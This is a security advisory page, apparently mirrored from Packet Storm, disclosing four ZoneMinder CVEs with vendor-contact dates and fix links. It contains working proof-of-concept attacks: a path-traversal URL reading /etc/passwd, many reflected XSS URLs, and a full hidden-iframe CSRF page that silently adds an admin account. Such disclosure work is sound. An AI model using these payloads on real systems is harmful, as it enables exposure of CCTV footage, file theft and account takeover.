Lucene search
John MarzellaPACKETSTORM:140927HistoryFeb 06, 2017 - 12:00 a.m.
ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass
2017-02-0600:00:00
John Marzella
packetstormsecurity.com
751
0.008 Low
EPSS
Percentile
79.7%
`==========================================================================
Product: ZoneMinder
Versions: Multiple versions - see inline
Vulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure
CVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140
Author: John Marzella
Date: 03/02/2017
==========================================================================
CVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29
==========================================================================
Contacted vendor on 08/11/2016
Apache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories
in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server.
PoC: http://<serverIP>/events
Fix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba
CVE-2017-5595 - File disclosure - affects v1.xx - code from 2008
================================================================
Contacted vendor on 22/01/2017
File disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data).
PoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd
Fix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3
CVE-2017-5367 - XSS - affects v1.30 and v1.29
=============================================
Contacted vendor on 20/11/2016
Multiple reflected XSS exists.
The following has been injected into vulnerable URLas to show that the users session cookie can be stolen.
%3Cscript%3Ealert(document.cookie);%3C/script%3E
In form input view using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword
In link input view using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E
In link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1
In form input view using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2
In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1
In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1
In form input limit using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
In link input limit using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
In form input limit using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
In link input limit using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
CVE-2017-5368 - CSRF - affects v1.30 and v1.29
==============================================
Contacted vendor on 20/11/2016
No CSRF protection exists across entire web app.
PoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in.
csrf_poc_addUser.html
<!-- Example of silent CSRF using iframe -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action="http://<serverIP>/zm/index.php" target="csrf-frame" id="csrf-form">
<input type="hidden" name="view" value="user"/>
<input type="hidden" name="action" value="user"/>
<input type="hidden" name="uid" value="0"/>
<input type="hidden" name="newUser[MonitorIds]" value=""/>
<input type="hidden" name="newUser[Username]" value="attacker1"/>
<input type="hidden" name="newUser[Password]" value="Password1234"/>
<input type="hidden" name="conf_password" value="Password1234"/>
<input type="hidden" name="newUser[Language]" value="en_gb"/>
<input type="hidden" name="newUser[Enabled]" value="1"/>
<input type="hidden" name="newUser[Stream]" value="View"/>
<input type="hidden" name="newUser[Events]" value="Edit"/>
<input type="hidden" name="newUser[Control]" value="Edit"/>
<input type="hidden" name="newUser[Monitors]" value="Edit"/>
<input type="hidden" name="newUser[Groups]" value="Edit"/>
<input type="hidden" name="newUser[System]" value="Edit"/>
<input type="hidden" name="newUser[MaxBandwidth]" value="high"/>
</form>
<script>document.getElementById("csrf-form").submit()</script>
`
Related
zdt
zdt
ZoneMinder - Multiple Vulnerabilities
2017-02-05 00:00:00
openvas
openvas
ZoneMinder Multiple Vulnerabilities
2017-02-06 00:00:00
Mageia: Security Advisory (MGASA-2017-0162)
2022-01-28 00:00:00
ZoneMinder Information Disclosure Vulnerability
2017-01-17 00:00:00
mageia
mageia
Updated zoneminder packages fix security vulnerability
2017-06-10 02:05:58
ubuntucve
ubuntucve
osv
osv
zoneminder - security update
2017-01-29 00:00:00
CVE-2016-10140
2017-01-13 09:59:00
CVE-2017-5368
2017-02-06 17:59:00
cve
cve
nessus
nessus
Debian DLA-806-1 : zoneminder security update
2017-01-30 00:00:00
Fedora 25 : zoneminder (2017-2bb174ae3c)
2017-02-21 00:00:00
Debian DLA-1145-1 : zoneminder security update
2017-10-27 00:00:00
prion
prion
Authentication flaw
2017-01-13 09:59:00
Cross site request forgery (csrf)
2017-02-06 17:59:00
Cross site scripting
2017-02-06 17:59:00
debiancve
debiancve
alpinelinux
alpinelinux
debian
debian
[SECURITY] [DLA 806-1] zoneminder security update
2017-01-29 15:05:24
[SECURITY] [DLA 1145-1] zoneminder security update
2017-10-26 16:18:22
fedora
fedora
[SECURITY] Fedora 24 Update: zoneminder-1.28.1-8.fc24
2017-02-18 18:50:20
[SECURITY] Fedora 25 Update: zoneminder-1.28.1-8.fc25
2017-02-18 18:21:48